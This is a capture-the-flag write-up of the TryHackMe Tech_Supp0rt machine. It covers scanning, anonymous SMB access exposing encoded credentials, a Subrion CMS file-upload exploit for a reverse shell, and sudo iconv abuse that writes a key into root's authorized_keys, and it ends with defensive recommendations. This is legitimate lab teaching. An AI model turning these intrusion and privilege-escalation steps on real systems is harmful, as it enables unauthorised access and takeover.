---
title: "Writeup - Tech_Supp0rt: 1 (THM)"
date: 2022-05-14
slug: "writeup-techsupp0rt1-thm"
type: "writeup-ctf"
--- 

This is a writeup for the [Tech\_Supp0rt](https://tryhackme.com/room/techsupp0rt1) machine from the TryHackMe site.

## Enumeration

First, let's start with a scan of our target with the following command:


```bash
nmap -sV -T4 -Pn 10.10.222.86
```
Four TCP ports are discovered:

![](img/image-1.webp)

- 22/tcp : SSH port (OpenSSH 7.2p2)
- 80/tcp : HTTP web server (Apache 2.4.18)
- 139/tcp : Samba (3.X - 4.X)
- 445/tcp : Samba  (3.X - 4.X)

![](img/image-2.webp)

## Exploit

First, I start by scanning the site's folders.

![](img/image-3.webp)

We find 2 interesting files:

![](img/image-4.webp)

![](img/image-5.webp)

After some research on the 2 sites, I decide to look at the smb server. For that I try to connect anonymously.

![](img/image-6.webp)

It works and I can get an `enter.txt` file.


```bash
GOALS
=====
1)Make fake popup and host it online on Digital Ocean server
2)Fix subrion site, /subrion doesn't work, edit from panel
3)Edit wordpress website

IMP
===
Subrion creds
|->admin:7sKvntXdPEJaxazce9PXi24zaFrLiKWCk [cooked with magical formula]
Wordpress creds
|->
```
In this file we learn the existence of another site in the `Subrion` folder, but in addition we are provided with credentials for it. After testing, the password doesn't seem to work. So I make a scan of the file to see if I can find something interesting:

![](img/image-7.webp)

A `robots.txt` file but nothing special in it:


```bash
User-agent: *
Disallow: /backup/
Disallow: /cron/?
Disallow: /front/
Disallow: /install/
Disallow: /panel/
Disallow: /tmp/
Disallow: /updates/
```
So I try to decrypt the password with CyberChef. As soon as I propose the string of characters, CyberChef decodes the following string of characters: [Cyberchef](https://gchq.github.io/CyberChef/#recipe=From_Base58('123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz',false)From_Base32('A-Z2-7%3D',false)From_Base64('A-Za-z0-9%2B/%3D',true)&input=N3NLdm50WGRQRUpheGF6Y2U5UFhpMjR6YUZyTGlLV0Nr)

![](img/image-8.webp)

So I try to use this password.

![](img/image-9.webp)

Now that I am connected and I know the version of Subrion, I start looking for exploits to have a reverse shell.


```bash
┌──(d3vyce㉿kali)-[~]
└─$ searchsploit subrion 4.2.1               
---------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                    |  Path
---------------------------------------------------------------------------------- ---------------------------------
Subrion 4.2.1 - 'Email' Persistant Cross-Site Scripting                           | php/webapps/47469.txt
Subrion CMS 4.2.1 - 'avatar[path]' XSS                                            | php/webapps/49346.txt
Subrion CMS 4.2.1 - Arbitrary File Upload                                         | php/webapps/49876.py
Subrion CMS 4.2.1 - Cross Site Request Forgery (CSRF) (Add Amin)                  | php/webapps/50737.txt
Subrion CMS 4.2.1 - Cross-Site Scripting                                          | php/webapps/45150.txt
---------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
```
Quickly I find a file sending exploit that would allow to get a reverse shell. I download it with the following command:


```bash
searchsploit -x php/webapps/49876.py > exploit.py
```
Then I run it with the following command:

![](img/image-10.webp)

Another solution to have a reverse shell would have been to use the upload page present in : content -> upload. While trying this solution I noticed that the version with the `.php` extension does not work but the `.phar` version does:

![](img/image-11.webp)

Searching I find that the first flag is held by the user `scamsite`. So I go to the wordpress folder to see if I can find information in the configuration files:


```bash
[...]
/** MySQL database username */
define( 'DB_USER', 'support' );

/** MySQL database password */
define( 'DB_PASSWORD', 'ImAScammerLOL!123!' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
[...]
```
So I try to connect via SSH with this password and it works. So I can recover the first flag.

![](img/image-12.webp)

## Privilege escalation

I start by looking at the sudo permissions:

![](img/image-13.webp)

My user has the right to execute the `iconv` command with root rights, so I'm looking for exploits on the GTFObin site: [iconv](https://gtfobins.github.io/gtfobins/iconv/#sudo).

There is a possibility to write in a file with this command. I will write my public RSA key in the `authorized_keys` to be able to connect in SSH:


```bash
echo "id_rsa.pub" | sudo iconv -f 8859_1 -t 8859_1 -o /root/.ssh/authorized_keys

```
I now have a root shell and can retrieve the last flag.

![](img/image-14.webp)

## Recommendations

To patch this host I think it would be necessary to perform a number of actions:

- Do not allow anonymous access on an SMB server
- Do not leave passwords in accessible files
- Do not leave executable applications with sudo root if not necessary